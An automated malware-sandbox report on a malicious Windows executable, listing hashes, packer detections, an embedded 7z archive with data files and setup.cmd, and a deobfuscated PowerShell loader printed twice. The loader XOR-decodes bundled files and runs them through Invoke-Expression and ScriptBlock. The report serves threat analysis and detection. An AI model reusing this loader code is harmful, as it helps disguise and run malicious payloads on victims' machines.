Malicious
Malicious

dc5b33705ec2d25b3c96f9075fc88d24

PE Executable
|
MD5: dc5b33705ec2d25b3c96f9075fc88d24
|
Size: 5.35 MB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
dc5b33705ec2d25b3c96f9075fc88d24
Sha1
9a078dd23ea1858dc551544e3204b45c8a7b7896
Sha256
fce5f95d9a8d8a4003af3fd63365d5f3a7746536d054d290534674fa8ef4b844
Sha384
e7d452ac6c35d6a75493f39fa855b01ed7fac758fa605e857ba454747d60de8ce31e376a878eaa416cd8527f634d6aa6
Sha512
8c7e74d34d6e0fff55b7205f6e8130f074eea421f04f005d227b845509d12165c659d7aa5bb246c559d157d60ceb41e882059cfa39f58466fad4fb79b1c84e91
SSDeep
98304:1gwR9CnkgpzeHXDmSZwuK5oGUhnCUwQRhNJrZ3tVjRSt/Cgu1i782PKlVQSxRfs:1guCtpzMzmSZwPnAwMj/wtKgMu2ET
TLSH
1446334072A959F5F15E1E7485592B6BDAE51E21073A43CBEB8738849EB13C3933A3C3

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
UPolyX 0.3 -> delikon
File Structure
dc5b33705ec2d25b3c96f9075fc88d24
Malicious
7z-stream @ 0x00022EA1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_e81884ef.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1049
ID:1049-preview.png
ID:0002
ID:1049
ID:0003
ID:1049
ID:0004
ID:1049
RT_GROUP_CURSOR4
ID:0000
ID:1049
ID:0065
ID:1049
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_e81884ef.bin (5206951 bytes)
Artefacts
Name
 Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 4706 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 4706 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 4706 [File]::"WriteAllBytes"("7za.exe", $encodedData)
dc5b33705ec2d25b3c96f9075fc88d24 (5.35 MB)
File Structure
dc5b33705ec2d25b3c96f9075fc88d24
Malicious
7z-stream @ 0x00022EA1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_e81884ef.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1049
ID:1049-preview.png
ID:0002
ID:1049
ID:0003
ID:1049
ID:0004
ID:1049
RT_GROUP_CURSOR4
ID:0000
ID:1049
ID:0065
ID:1049
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 4706 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 4706 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 4706 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Malicious

dc5b33705ec2d25b3c96f9075fc88d24 > 7z-stream @ 0x00022EA1.7z > setup.cmd
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙